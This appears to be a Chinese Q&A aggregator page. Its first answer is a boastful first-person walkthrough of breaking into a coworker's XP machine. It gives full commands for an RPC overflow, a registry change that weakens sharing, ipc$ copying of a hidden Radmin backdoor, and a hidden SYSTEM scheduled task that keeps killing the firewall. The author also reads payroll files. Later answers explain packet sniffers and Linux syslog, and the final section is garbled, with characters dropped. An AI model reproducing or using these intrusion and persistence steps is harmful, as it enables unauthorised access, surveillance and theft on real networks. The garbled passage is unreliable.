本文目录一览:
- 1、局域网入侵命令有哪些?
- 2、网博士,PHP源码,adm文件夹下 PHP好像都被加密了,求解密, 请高手查看一下
- 3、网络高手请进
- 4、怎么查看进程日志文件
- 5、系统日志全改notice,有几条日志不太清楚求解释
局域网入侵命令有哪些?
先打开命令提示符,用 ping 命令去ping 它,Reply from 192.168.16.4: bytes=32 time1ms TTL=128,说明对方没有防火墙,这样或许有可能入侵。
下一步,我使用了X-SCAN 3.2对它进行了详细扫描,对方电脑的操作系统是XP,大家知道XP系统是相当安全的,在一些黑客论坛讨论的关于入侵XP的话题也是比较多的,入侵这样的系统方法只有两种,一是采用钓鱼的方法,这是一种被动的方式让对方中木马来控制它。
第二种方法就是如果对方有比较严重的漏洞,如RPC溢出
先打开命令提示符,用 ping 命令去ping 它,Reply from 192.168.16.4: bytes=32 time1ms TTL=128,说明对方没有防火墙,这样或许有可能入侵。下一步,我使用了X-SCAN 3.2对它进行了详细扫描,对方电脑的操作系统是XP,大家知道XP系统是相当安全的,在一些黑客论坛讨论的关于入侵XP的话题也是比较多的,入侵这样的系统方法只有两种,一是采用钓鱼的方法,这是一种被动的方式让对方中木马来控制它。第二种方法就是如果对方有比较严重的漏洞,如RPC溢出。这样的话,用溢出程序溢出它,然后再上传控制程序进行控制。扫描结果确实让我高兴了一阵,对方电脑有大量的漏洞,其中一个比较有名的就是冲击波利用的RPC漏洞,这个漏洞相当出名了,03年的时候曾席卷全球。知道了它有这个漏洞,下一步就要找溢出程序,这让我忙活了好一阵时间,因为有的溢出程序对这台电脑好像无效。这些工具的名称我都记不起来了,反正有好几个。最后找到了一个溢出程序XP.EXE,这个程序终于溢出了那台电脑。得到了个CMDSHELL。这算是一个小小的胜利吧。
得到了CMDSHELL,我该怎样给它上传控制程序呢?我想了一会儿,终于灵感来了,我和它在一个局域网,用共享上传最方便了。于是打开网上邻居,查看工作组计算机,找到这台电脑,双击,进不去,提示信息我记不清了,据我分析可能是对方这台电脑没有运行网络安装向导,因为是XP系统,所以要用共享传输文件,必须要运行这个向导不可,运行这个向导作用就是配置一个本地安全策略,你可以打开“控制面板—管理工具—本地安全策略”,展开“本地策略”—“用户权利指派”。在右边有一个安全策略—“拒绝从网络访问这台计算机”。我想对方的电脑中相应的这条策略里,肯定设置有GUEST这个用户的,这就是为什么我打不开它的共享的原因,因为共享访问默认是以这个GEUST用户登录的,因为它的安全设置不允许GUEST从网络访问,所以我才访问不了它的共享。因为XP 默认的共享模式是简单文件共享。这与WIN2000系统不同,如果是WIN2000系统,你在知道管理员密码的情况下,可以用命令net use IPipc$ "密码" /user:用户名 建立与对方的ipc$连接,随之而来的就是copy 木马程序 ipd$这样的命令上传木马了。XP就不能这样子了,你即使知道它的管理员密码用上面的命令与不能建立ipc$连接。这就是为什么XP比2000系统安全的地方所在。下面我要作的就是要修改XP的共享模式为2000的共享模式。方法如下:在溢出获得的CMDSHELL下,键入命令:
echo Windows Registry Editor Version 5.00 c:123.reg
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa] c:123.reg
echo. c:123.reg
echo "forceguest"=dword:00000000 c:123.reg
regedit /e c:123.reg
等打完这几条命令后,对方XP的共享模式就已经与2000的相同了。我来解释一下这几条命令的含意,echo Windows Registry Editor Version 5.00 c:123.reg这条命令是将Windows Registry Editor Version 5.00这几个字符保存到c:123.reg文件里。大家需要注意一下第一句的 和后面几句的这是有区别的,字符是覆盖式的,是追加式的,第三句的echo. c:123.reg命令是追加一个空白行,这句挺重要,如果不加这句是不能成功的,你可以随便打开一个注册表文件看一下,格式就是这样的,第二行是空着的。这一点一定要注意。执行完前四条命令后就在对方C盘下生成一个123.reg文件,内容如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa]
"forceguest"=dword:00000000
第五条命令是将这个REG文件导入到注册表中。这样执行完这五条命令后,我就可以像操作2000系统一样去用ipc$控制了。下一步,上传控制程序。我选择的是RADMIN2.0的服务程序,有人问这个安装需要到图形界面下,我说不用这么费事,在CMDSHELL下一样可以安装。安装前我们需要先准备一下,首先生成一个REG文件,文件名:aaa.reg 内容如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParameters]
"DisableTrayIcon"=hex:01,00,00,00
作用就是使生成的服务端程序能够隐藏通知栏里的图标,我们都知道正常安装RADMIN服务端程序后,在通知栏里是有一个小图标的,我们要入侵人家,当然要把这个小图标去掉,不然是会被发现的。接着生成一个BAT文件,我命名为aaa.bat,内容如下:
r_server /install /silence
r_server.exe /port:2233 /pass:1 /save /silence
regedit.exe /s aaa.reg
net start r_server
这些命令是安装命令,设置连接端口为:2233 密码是:1 隐藏安装界面的方式安装 然后就是将aaa.reg导入注册表,启动r_server服务。
准备工作作好后,就要上传文件了,一共需上传4个文件,aaa.reg aaa.bat r_server.exe admdll.dll 后两个文件是RADMIN安装目录下的,在安装了RADMIN2.0客户端后,安装目录里就有这两个文件。我先建立ipc$连接 net use 192.168.16.4ipc$ "" /user:administrator 提示:命令成功完成。接着:
copy r_server 192.168.1.4admin$system32
copy aaa.bat 192.168.1.4admin$system32
copy aaa.reg 192.168.1.4admin$system32
copy admdll.dll 192.168.1.4admin$system32
然后再进入溢出得到的CMDSHELL下键入:
attrib +s +h +r c:windowssystem32r_server.exe
attrib +s +h +r c:windowssystem32admdll.exe
attrib +s +h +r c:windowssystem32aaa.bat
attrib +s +h +r c:windowssystem32aaa.reg
这些命令是将这4个文件设置成系统隐藏只读文件,不容易被对方管理员发现。
下一步就是运行aaa.bat了,就这么简单,运行成功后,我用radmin2.0客户端设置了一下连接参数,端口改成2233,连接成功,密码是1,成功地看到了对方的屏幕。呵呵,成功了,从有入侵的想法到入侵成功进行控制,只用了短短的4天时间。
进入后看到对方电脑上正在玩QQ保皇游戏,不过我也犯了个错误我给它新建了个管理用户,原先是打算用于ipc$连接用的,可我上传RADMIN控制后忘记删掉了,我在溢出的CMDSHELL 下不小心键入了命令EXIT,结果对方电脑出现了倒计时关机的界面,我也没有及时处理掉,我当时要是用RADMIN的CMD功能,键入命令 shutdown -A就可以取消这个倒计时关机的界面,可当时我也没有及时处理,导致对方电脑重启了,重启后我估计对方管理员看到了我新建的用户了,后来我用RADMIN 远程查看时,也觉得这个新建用户太招摇了,用户名就是ip$ ,图标是个大红的花朵。
下午的时候我发现那台电脑的管理员请了位高手来助阵了,因为我们这个局域网中的各台电脑都通过我们办公室里的那台电脑连接到互联网上,所以,那位高手先到我们办公室电脑上查看了一番没有发现问题后,他将原先安装的江民换成了卡巴了,我估计他认为攻击是来自互联网上,岂不知黑客就在他眼皮底下,嘿嘿。。。。那位高手又给被我控制了的电脑上安装了卡巴,原先的杀毒软件是诺顿,对WINDOWS也进行了更新,可这些作法都晚了,因为我已经控制你了,再打补丁也无用了。经过那位高手一番检查与修补后,我的后门依然存在着,看来那位高手水平也不怎么样。我给它开放的ipc$功能,他也没发现。也许他只认为是一次简单的病毒攻击,而掉以轻心了,而不知他的一举一动都在我的监视之下。哈哈。。。
接下来的工作对我来说就比较简单了,给它开telnet服务器,开“远程桌面”这个我采用的是图形的方式进行操作的,中午下班后我等这台计算机管理员走后,用RADMIN登录进去进行了一些设置工作。后来也通过RADMIN的文件管理功能翻看了这台电脑上的文件,有一些财务报表,工资表之类的东西,这些对我来看没什么大的吸引力。不过我看到了我们集团老总的工资,每月一万多块钱呢!!好黑啊。。。这么多,我工资只有区区几百块,真是太不公平了,愤愤不平中。。。。
后来一次通过RADMIN操作对方的电脑时不小心被管理员发现了,我想对方的管理员也很感到意外, windows的补丁打上了,还装了强悍的卡巴,还是搞不定黑客!!哈哈,因为卡巴不是杀RADMIN的。后来对方那个管理员启用了局域网“本地连接”中的防火墙功能,这样我无法连接它的电脑了。因为RADMIN是正向连接的,所以在对方开防火墙的情况下是无法使用的。有一次下午下班后我无意地ping 了一下这台电脑的IP,居然有返回。说明对方防火墙关闭了,我马上用RADMIN连接,居然成功。我晕。。。原来对方只开了防火墙,并没有发现这个明显的后门。我想开防火墙也是那位电脑高手给搞的,依那个管理员的水平是想不到这个办法的。不过telnet服务器给关闭了,3389远程桌面也给关了,共享模式也被修改回了原先的样子。看来那位高手也是发现了一些漏洞并补上了,但是那个后门,他却没有发现,这就给我创造了第二次入侵的机会。他有政策我有对策,他可以开防火墙,我可以给他关掉,有人问要是再被管理员开启了防火墙,那岂不是没得玩了。哈哈。。。我下面给出一个我自己研究出来的独门密方,保证百病!哈哈。。。。
我的方法是创建一个隐藏的计划任务。让这个计划任务每隔半个小时杀除一遍防火墙,这样即使对方管理员打开防火墙也起不了什么作用。方法如下:先建一个批处理文件abc.bat,放在c:windowssystem32目录下,内容如下:
net stop sharedaccess
当然也可以附加点别的,比如说你想半小时杀除一遍天网防火墙,可以再加上下面的命令:
taskkill /IM rfw.exe /f
如果想使共享模式是高级共享模式,可以再加上下面的命令:
regedit /e c:windowssystem32abc.reg
当然这需要事先上传一个abc.reg到它的c:windowssystem32目录下,内容如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa]
"forceguest"=dword:00000000
下面我说一下创建隐藏计划任务的方法:
在对方电脑的CMDSHELL下键入命令:
schtasks /create /tn "常驻" /tr c:windowssystem32abc.bat /sc minute /mo 30 /ru "system"
这样就在对方电脑上建立了一个以SYSTEM权限运行的计划任务,这个计划任务每隔30分钟运行一次c: windowssystem32abc.bat,功能嘛,就是根据abc.bat里面的命令行决定了,可以说这个新发现是相当厉害的,利用的巧妙,功能可以相当强大。如果只有这样还不能达到隐藏的要求,你打开控制面板—任务计划,仍然可以发现它的存在。好的,下面说说隐藏它的方法。还是进入 CMDSHELL中。键入命令attrib +h c:windowstasks常驻.job回车后,你再到控制面板的任务计划中看一下是不是以前的任务消失了。这只是表面消失,实际是它还是存在的。你可以在CMDSHELL下键入命令:schtasks查看。这样不管对方管理员怎样修改设置,每隔半小时就又会补修改回来。它想摆脱我的控制可说是难上加难了。
网博士,PHP源码,adm文件夹下 PHP好像都被加密了,求解密, 请高手查看一下
php已经加密的代码不可能被解密的,除非zend公司来帮忙。 不可以解密,你最好不要修改,不然会很乱。
网络高手请进
络安全如何使用Sniffer抓包/使用方法
随着Internet及电子商务的日益普及,Internet的安全也越来越受到重视。而在Internet安全隐患中扮演重要角色的是Sniffer和Scanner,本文将介绍Sniffer以及如何阻止sniffer。
大多数的黑客仅仅为了探测内部网上的主机并取得控制权,只有那些"雄心勃勃"的黑客,为了控制整个网络才会安装特洛伊木马和后门程序,并清除记录。他们经常使用的手法是安装sniffer。
在内部网上,黑客要想迅速获得大量的账号(包括用户名和密码),最为有效的手段是使用 "sniffer" 程序。这种方法要求运行Sniffer 程序的主机和被监听的主机必须在同一个以太网段上,故而在外部主机上运行sniffer 是没有效果的。再者,必须以root的身份使用sniffer 程序,才能够监听到以太网段上的数据流。
黑客会使用各种方法,获得系统的控制权并留下再次侵入的后门,以保证sniffer能够执行。在Solaris 2.x平台上,sniffer 程序通常被安装在/usr/bin或/dev目录下。黑客还会巧妙的修改时间,使得sniffer程序看上去是和其它系统程序同时安装的。
大多数 "ethernet sniffer"程序在后台运行,将结果输出到某个记录文件中。黑客常常会修改ps程序,使得系统管理员很难发现运行的sniffer程序。
"ethernet sniffer"程序将系统的网络接口设定为混合模式。这样,它就可以监听到所有流经同一以太网网段的数据包,不管它的接受者或发送者是不是运行sniffer的主机。 程序将用户名、密码和其它黑客感兴趣的数据存入log文件。黑客会等待一段时间 ----- 比如一周后,再回到这里下载记录文件。
一、什么是sniffer
与电话电路不同,计算机网络是共享通讯通道的。共享意味着计算机能够接收到发送给其它计算机的信息。捕获在网络中传输的数据信息就称为sniffing(窃听)。
以太网是现在应用最广泛的计算机连网方式。以太网协议是在同一回路向所有主机发送数据包信息。数据包头包含有目标主机的正确地址。一般情况下只有具有该地址的主机会接受这个数 据包。如果一台主机能够接收所有数据包,而不理会数据包头内容,这种方式通常称为"混杂" 模式。
由于在一个普通的网络环境中,帐号和口令信息以明文方式在以太网中传输,一旦入侵者获 得其中一台主机的root权限,并将其置于混杂模式以窃听网络数据,从而有可能入侵网络中的所有计算机。
二、sniffer工作原理
通常在同一个网段的所有网络接口都有访问在物理媒体上传输的所有数据的能力,而每个网络接口都还应该有一个硬件地址,该硬件地址不同于网络中存在的其他网络接口的硬件地址,同时,每个网络至少还要一个广播地址。(代表所有的接口地址),在正常情况下,一个合法的网络接口应该只响应这样的两种数据帧:
1、帧的目标区域具有和本地网络接口相匹配的硬件地址。
2、帧的目标区域具有"广播地址"。
在接受到上面两种情况的数据包时,nc通过cpu产生一个硬件中断,该中断能引起操作系统注意,然后将帧中所包含的数据传送给系统进一步处理。
而sniffer就是一种能将本地nc状态设成(promiscuous)状态的软件,当nc处于这种"混杂"方式时,该nc具备"广播地址",它对所有遭遇到的每一个帧都产生一个硬件中断以便提醒操作系统处理流经该物理媒体上的每一个报文包。(绝大多数的nc具备置成promiscuous方式的能力)
可见,sniffer工作在网络环境中的底层,它会拦截所有的正在网络上传送的数据,并且通过相应的软件处理,可以实时分析这些数据的内容,进而分析所处的网络状态和整体布局。值得注意的是:sniffer是极其安静的,它是一种消极的安全攻击。
通常sniffer所要关心的内容可以分成这样几类:
1、口令:
我想这是绝大多数非法使用sniffer的理由,sniffer可以记录到明文传送的userid和passwd.就算你在网络传送过程中使用了加密的数据,sniffer记录的数据一样有可能使入侵者在家里边吃肉串边想办法算出你的算法。
2、金融帐号:
许多用户很放心在网上使用自己的信用卡或现金帐号,然而sniffer可以很轻松截获在网上传送的用户姓名、口令、信用卡号码、截止日期、帐号和pin。
3、偷窥机密或敏感的信息数据:
通过拦截数据包,入侵者可以很方便记录别人之间敏感的信息传送,或者干脆拦截整个的email会话过程。
4、窥探低级的协议信息:
这是很可怕的事,我认为,通过对底层的信息协议记录,比如记录两台主机之间的网络接口地址、远程网络接口ip地址、ip路由信息和tcp连接的字节顺序号码等。这些信息由非法入侵的人掌握后将对网络安全构成极大的危害,通常有人用sniffer收集这些信息只有一个原因:他正在进行一次欺诈,(通常的ip地址欺诈就要求你准确插入tcp连接的字节顺序号,这将在以后整理的文章中指出)如果某人很关心这个问题,那么sniffer对他来说只是前奏,今后的问题要大条得多。(对于高级的hacker而言,我想这是使用sniffer的唯一理由吧)。
三、哪里可以得到sniffer
Sniffer是黑客们最常用的入侵手段之一。你可以在经过允许的网络中运行sniffer,了解它是如何有效地危及本地机器安全。
Sniffer可以是硬件,也可以是软件。现在品种最多,应用最广的是软件Sniffer, 绝大多数黑客们用的也是软件Sniffer。
以下是一些也被广泛用于调试网络故障的sniffer工具:
商用sniffer:
1 Network General.
Network General开发了多种产品。最重要的是Expert Sniffer,它不仅仅可以sniff,还能够通过高性能的专门系统发送/接收数据包,帮助诊断故障。还有一个增强产品"Distrbuted SnifferSystem"可以将UNIX工作站作为sniffer控制台,而将snifferagents(代理)分布到远程主机上。
2 Microsoft's Net Monitor
对于某些商业站点,可能同时需要运行多种协议--NetBEUI、IPX/SPX、TCP/IP、802.3和SNA等。这时很难找到一种sniffer帮助解决网络问题,因为许多sniffer往往将某些正确的协议数据包当成了错误数据包。Microsoft的Net Monitor(以前叫Bloodhound)可以解决这个难题。它能够正确区分诸如Netware控制数据包、NTNetBios名字服务广播等独特的数据包。(etherfind只会将这些数据包标识为类型0000的广播数据包。)这个工具运行在MS Windows平台上。它甚至能够按MAC地址(或主机名)进行网络统计和会话信息监视。只需简单地单击某个会话即可获得tcpdump标准的输出。过滤器设置也是最为简单的,只要在一个对话框中单击需要监视的主机即可。
免费软件sniffer
1 Sniffit由Lawrence Berkeley 实验室开发,运行于Solaris、SGI和Linux等平台。可以选择源、目标地址或地址集合,还可以选择监听的端口、协议和网络接口等。这个SNIFFER默认状态下只接受最先的400个字节的信息包,这对于一次登陆会话进程刚刚好。
2 SNORT:这个SNIFFER有很多选项供你使用并可移植性强,可以记录一些连接信息,用来跟踪一些网络活动。
3 TCPDUMP:这个SNIFFER很有名,linux,FREEBSD还搭带在系统上,是一个被很多UNIX高手认为是一个专业的网 络管理工具,记得以前TsutomuShimomura(应该叫下村侵吧)就是使用他自己修改过的TCPDUMP版本来记录了KEVINMITNICK攻击他系统的记录,后来就配合FBI抓住了KEVINMITNICK,后来他写了一文:使用这些LOG记录描述了那次的攻击,How Mitnick hacked Tsutomu Shimomura with an IP sequence attack
( ... niffer/shimomur.txt)
4 ADMsniff:这是非常有名的ADM黑客集团写的一个SNIFFER程序。
5 linsniffer:这是一个专门设计杂一LINUX平台上的SNIFFER。
6 Esniffer:这个也是一个比较有名的SNIFFER程序。
7 Solsniffer:这是个Solarissniffer,主要是修改了SunSniff专门用来可以方便的在Solair平台上编译。
8 Ethereal是一基于GTK+的一个图形化Sniffer。
9 Gobbler(for MS-DOS&Win95)、Netman、NitWit、Ethload...等等。
--------------------------------------------------------------------------------
怎么查看进程日志文件
日志文件详细地记录了系统每天发生的各种各样的事件。用户可以通过日志文件检查错误产生的原因,或者在受到攻击和黑客入侵时追踪攻击者的踪迹。日志的两个比较重要的作用是:审核和监测。
Linux系统的日志主要分为两种类型:
1.进程所属日志
由用户进程或其他系统服务进程自行生成的日志,比如服务器上的access_log与error_log日志文件。
2.syslog消息
系统syslog记录的日志,任何希望记录日志的系统进程或者用户进程都可以给调用syslog来记录日志。
日志系统可以划分为三个子系统:
1. 连接时间日志--由多个程序执行,把纪录写入到/var/log/wtmp和/var/run/utmp,login等程序更新wtmp和utmp文件,使系统管理员能够跟踪谁在何时登录到系统。
2. 进程统计--由系统内核执行。当一个进程终止时,为每个进程往进程统计文件(pacct或acct)中写一个纪录。进程统计的目的是为系统中的基本服务提供命令使用统计。
3. 错误日志--由syslogd(8)执行。各种系统守护进程、用户程序和内核通过syslog(3)向文件/var/log/messages报告值得注意的事件。
2.察看日志文件
Linux系统所有的日志文件都在/var/log下,且必须有root权限才能察看。
日志文件其实是纯文本的文件,每一行就是一个消息。察看方式有很多。
1. cat命令。日志文件总是很大的,因为从第一次启动Linux开始,消息都累积在日志文件中。如果这个文件不只一页,那么就会因为显示滚动得太快看不清文件的内容。
2. 文本编辑器。最好也不要用文本编辑器打开日志文件,这是因为一方面很耗费内存,另一方面不允许随意改动日志文件。
3.用more或less那样的分页显示程序。
4.用grep查找特定的消息。
每一行表示一个消息,而且都由四个域的固定格式组成:
n 时间标签(timestamp),表示消息发出的日期和时间
n 主机名(hostname)(在我们的例子中主机名为escher),表示生成消息的计算机的名字。如果只有一台计算机,主机名就可能没有必要了。但是,如果在网络环境中使用syslog,那么就可能要把不同主机的消息发送到一台服务器上集中处理。
n 生成消息的子系统的名字。可以是"kernel",表示消息来自内核,或者是进程的名字,表示发出消息的程序的名字。在方括号里的是进程的PID。
n 消息(message),剩下的部分就是消息的内容。
举例:
在[root@localhost root]# 提示符下输入:tail /var/log/messages
Jan 05 21:55:51 localhost last message repeated 3 times
Jan 05 21:55:51 localhost kernel: [drm] AGP 0.99 on Intel i810 @ 0xf0000000 128M
B
Jan 05 21:55:51 localhost kernel: [drm] Initialized i830 1.3.2 20021108 on minor
Jan 05 21:55:51 localhost kernel: mtrr: base(0xf0000000) is not aligned on a siz
e(0x12c000) boundary
Jan 05 21:56:35 localhost 1月 28 21:56:35 gdm(pam_unix)[4079]: session opened f
or user root by (uid=0)
Jan 05 21:56:39 localhost 1月 28 21:56:39 gconfd (root-4162): 正在启动(版本 2.
2.0),pid 4162 用户"root"
Jan 05 21:56:39 localhost 1月 28 21:56:39 gconfd (root-4162): 解析的地址"xml:re
adonly:/etc/gconf/gconf.xml.mandatory"指向位于 0 的只读配置源
Jan 05 21:56:39 localhost 1月 28 21:56:39 gconfd (root-4162): 解析的地址"xml:re
adwrite:/root/.gconf"指向位于 1 的可写入配置源
Jan 05 21:56:39 localhost 1月 28 21:56:39 gconfd (root-4162): 解析的地址"xml:re
adonly:/etc/gconf/gconf.xml.defaults"指向位于 2 的只读配置源
Jan 05 21:58:20 localhost kernel: MSDOS FS: IO charset cp936
值得注意的是,与连接时间日志不同,进程统计子系统默认不激活,它必须启动。在Linux
系统中启动进程统计使用accton命令,必须用root身份来运行。accton命令的形式为:accton
file,file必须事先存在。先使用touch命令创建pacct文件:touch
/var/log/pacct,然后运行accton:accton
/var/log/pacct。一旦accton被激活,就可以使用lastcomm命令监测系统中任何时候执行的命令。若要关闭统计,可以使用不带任何
参数的accton命令。
3.日志系统工作原理及配置
3.1 syslog
它同closelog, openlog共同给system logger发送消息。
Linux内核由很多子系统组成,包括网络、文件访问、内存管理等。子系统需要给用户传送一些消息,这些消息内容包括消息的来源及其重要性等。所有的子系统都要把消息送到一个可以维护的公用消息区。于是,就有了一个叫Syslog的程序。
这个程序负责接收消息(比如:系统核心和许多系统程序产生的错误信息、警告信息和其他信息,每个信息都包括重要级),并把消息分发到合适的地方。通常情况
下,所有的消息都被记录到特定的文件——日志文件中(通常是/var/adm或/var/log目录下的messages文件),特别重要的消息也会在用
户终端窗口上显示出来。
syslog工具有两个重要文件:syslogd和syslog.Conf
它能接受访问系统的日志信息并且根据 "/etc/syslog.conf" 配置文件中的指令处理这些信息。守护进程和内核提供了访问系统的日志信息。因此,任何希望生成日志信息的程序都可以向 syslog 接口呼叫生成该信息。
3.2 syslogd守护进程
就象其它复杂的操作系统那样,Linux也是由很多不同的子系统组成的。有些叫做daemon的程序一直在后台运行(daemon:守护神之意。也就是
说,他们"默默无闻",不需要和用户交互),处理一些象打印、发送邮件、建立Internet连接,等等日常工作。每一个子系统发出日志消息的时候都会给
消息指定一个类型。一个消息分成两个部分:"设备(facility)"和"级别(level)"。"设备"标识发出消息的子系统,可以把同一类型的消息组合在一起,"级别"表示消息的重要性,其范围从debug(最不重要)到emerg(最重要),facility和level组合起来称为priority。(详细解释参照5.3)
/usr/include/sys/syslog.h中对此有相关的定义。
用户看不到daemon程序,因为它们没有窗口和用户界面。但是,这些程序有时候也要给用户传递一些信息。为了实现这个目的,就需要一个特殊的机制。syslogd就是daemon的一个很好的例子,它在后台运行并且把消息从日志区转移到日志文件中去。
函数接口
#include
void openlog( char * , int , int )
其中,可以是以下值的OR组合:
LOG_CONS : 如果消息无法送到syslogd,直接输出到系统console。
LOG_NDELAY : 立即打开到syslogd的连接,默认连接是在第一次写入讯息时才打开的。
LOG_PERROR : 将消息也同时送到stderr 上
LOG_PID : 将PID记录到每个消息中
void syslog( int , char * )
其中,是facility和level的OR组合
void closelog( void )
一般只需要用syslog()函数,其他函数可以不用。
3.3 syslog.conf
这是一个非常重要的文件。位于"/etc/"目录下。通知 syslogd 如何根据设备和信息重要级别来报告信息。
该文件使用下面的形式:
facility.level action
syslog.conf 的第一列facility.level用来指定日志功能和日志级别,中间用.隔开,可以使用*来匹配
所有的日志功能和日志级别。第二列action是消息的分发目标。
空白行和以#开头的行是注释,可以忽略。
Facility.level 字段也被称做选择域(seletor)。
n facility 指定 syslog 功能,主要包括以下这些:
auth 由 pam_pwdb 报告的认证活动。
authpriv 包括特权信息如用户名在内的认证活动
cron 与 cron 和 at 有关的信息。
daemon 与 inetd 守护进程有关的信息。
kern 内核信息,首先通过 klogd 传递。
lpr 与打印服务有关的信息。
mail 与电子邮件有关的信息
mark syslog 内部功能用于生成时间戳
news 来自新闻服务器的信息
syslog 由 syslog 生成的信息
user 由用户程序生成的信息
uucp 由 uucp 生成的信息
local0----local7 与自定义程序使用,例如使用 local5 做为 ssh 功能
* 通配符代表除了 mark 以外的所有功能
level 级别,决定讯息的重要性。
与每个功能对应的优先级是按一定顺序排列的,emerg 是最高级,其次是 alert,依次类推。缺省时,在 /etc/syslog.conf 记录中指定的级别为该级别和更高级别。如果希望使用确定的级别可以使用两个运算符号!(不等)和=。
例如:user.=info 表示告知 syslog 接受所有在 info 级别上的 user 功能信息。
n 以下的等级重要性逐次递减:
emerg 该系统不可用
alert 需要立即被修改的条件
crit 阻止某些工具或子系统功能实现的错误条件
err 阻止工具或某些子系统部分功能实现的错误条件
warning 预警信息
notice 具有重要性的普通条件
info 提供信息的消息
debug 不包含函数条件或问题的其他信息
none 没有重要级,通常用于排错
* 所有级别,除了none
n action 字段为动作域,所表示的活动具有许多灵活性,特别是,可以使用名称管道的作用是可以使 syslogd 生成后处理信息。
syslog 主要支持以下活动:
file 将消息追加到指定的文件尾
terminal 或 print 完全的串行或并行设备标志符
@host 远程的日志服务器
username 将消息写到指定的用户
named pipe 指定使用 mkfifo 命令来创建的 FIFO 文件的绝对路径。
* 将消息写到所有的用户
选择域指明消息的类型和优先级;动作域指明syslogd接收到一个与选择标准相匹配的消息时所执行的动作。每个选项是由设备和优先级组成。当指明一个优先级时,syslogd将纪录一个拥有相同或更高优先级的消息。比如如果指明"crit",则所有标为crit、alert和emerg的消息将被纪录。每行的行动域指明当选择域选择了一个给定消息后应该把他发送到什么地方。
以下是一个实际站点的配置(syslog.conf)文件:
# Store critical stuff in critical
#
*.=crit;kern.none /var/adm/critical
这个将把所有信息以优先权的crit保存在/var/adm/critical文件中,除了一些内核信息
# Kernel messages are first, stored in the kernel
# file, critical messages and higher ones also go
# to another host and to the console
#
kern.* /var/adm/kernel
kern.crit @finlandia
kern.crit /dev/console
kern.info;kern.!err /var/adm/kernel-info
第一条代码指引一些内核设备访问文件/var/adm/kernel的信息。
第二条代码直接引导所有拥有crit和更高优先权的内核信息访问远程主机。如果它们也存储在远程主机上,仍旧可以试着找到毁坏的原因。
第四行说明syslogd 保存了所有拥有info 到warning优先级的内核信息在/var/adm/kernel-info文件夹下。所有err和更高优先级的被排除在外。
# The tcp wrapper loggs with mail.info, we display
# all the connections on tty12
#
mail.=info /dev/tty12
这个引导所有使用mail.info (in source LOG_MAIL | LOG_INFO)的信息到/dev/tty12下,第12
个控制台。例如tcpwrapper
tcpd
(8)载缺省时使用这个
# Store all mail concerning stuff in a file
mail.*;mail.!=info /var/adm/mail
模式匹配了所有具有mail功能的信息,除了拥有info优先级的。他们将被保存在文件/var/adm/mail中
# Log all mail.info and news.info messages to info
#
mail,news.=info /var/adm/info
提取所有具有mail.info 或news.info 功能优先级的信息存储在文件/var/adm/info中
# Log info and notice messages to messages file
#
*.=info;*.=notice;\
mail.none /var/log/messages
使所有syslogd日志中具有info 或notice功能的信息存储在文件/var/log/messages中,除了所有mail功能的信息
# Log info messages to messages file
#
*.=info;\
mail,news.none /var/log/messages
这个声明使syslogd日志中所有具有info优先权的信息存储在/var/log/messages文件中。但是一些有mail 或news功能的信息不能被存储。
# Emergency messages will be displayed using wall
#
*.=emerg *
这行代码告诉syslogd写所有紧急信息到所有当前登陆用户日志中。这个将被实现
# Messages of the priority alert will be directed
# to the operator
#
*.alert root,joey
*.* @finlandia
这个代码指引所有具有alert 或更高级权限的信息到终端操作。
第二行代码引导所有信息到叫做finlandia的远程主机。这个代码非常有用,特别是在所有syslog信息将被保存到一台机器上的群集计算机。
3.4 klogd 守护进程
klog是一个从UNIX内核接受消息的设备
klogd
守护进程获得并记录 Linux 内核信息。通常,syslogd 会记录 klogd
传来的所有信息。也就是说,klogd会读取内核信息,并转发到syslogd进程。然而,如果调用带有 -f filename 变量的 klogd
时,klogd 就在 filename 中记录所有信息,而不是传给 syslogd。当指定另外一个文件进行日志记录时,klogd
就向该文件中写入所有级别或优先权。Klogd 中没有和 /etc/syslog.conf 类似的配置文件。使用 klogd 而避免使用
syslogd 的好处在于可以查找大量错误。
总结
其中,箭头代表发送消息给目标进程或者将信息写入目标文件。
图1 Linux日志系统
日志管理及日志保护
logrotate程序用来帮助用户管理日志文件,它以自己的守护进程工作。logrotate周期性地旋转日志文件,可以周期性地把每个日志文件重命名
成一个备份名字,然后让它的守护进程开始使用一个日志文件的新的拷贝。在/var/log/下产生如maillog、maillog.1、
maillog.2、boot.log.1、boot.log.2之类的文件。它由一个配置文件驱动,该文件是
/etc/logroatate.conf。
以下是logroatate.conf文件例子:
# see "man logrotate" for details
# rotate log files weekly
weekly
#以7天为一个周期
# keep 4 weeks worth of backlogs
rotate 4
#每隔4周备份日志文件
# send errors to root
errors root
#发生错误向root报告
# create new (empty) log files after rotating old ones
create
#转完旧的日志文件就创建新的日志文件
# uncomment this if you want your log files compressed
#compress
#指定是否压缩日志文件
# RPM packages drop log rotation information into this directory
include /etc/logrotate.d
# no packages own lastlog or wtmp -- we'll rotate them here
/var/log/wtmp {
monthly
create 0664 root utmp
rotate 1
}
# system-specific logs may be configured here
在网络应用中,有一种保护日志的方式,在网络中设定一台秘密的syslog主机,把这台主机的网卡设为混杂模式,用来监听子网内所有的syslog包,这
样把所有需要传送日志的主机配置为向一台不存在的主机发送日志即可。这样即使黑客攻陷了目标主机,也无法通过syslog.conf文件找到备份日志的主
机,那只是一个不存在的主机。实际操作中还可以辅以交换机的配置,以确保syslog包可以被备份日志主机上的syslog进程接受到。比如把
syslog.conf中的传送日志主机设为
@192.168.0.13,但实际网络中不存在这个日志主机,实际可能是192.168.0.250或者其他主机正在接受syslog包。
系统日志全改notice,有几条日志不太清楚求解释
志文件详细记录系统每发各种各事件用户通志文件检查错误产原或者受攻击黑客入侵追踪攻击者踪迹志两比较重要作用:审核监测
Linux系统志主要两种类型:
1.进程所属志
由用户进程或其系统服务进程自行志比服务器access_log与error_log志文件
2.syslog消息
系统syslog记录志任何希望记录志系统进程或者用户进程都给调用syslog记录志
志系统划三系统:
1. 连接间志--由程序执行纪录写入/var/log/wtmp/var/run/utmplogin等程序更新wtmputmp文件使系统管理员能够跟踪谁何登录系统
2. 进程统计--由系统内核执行进程终止每进程往进程统计文件(pacct或acct)写纪录进程统计目系统基本服务提供命令使用统计
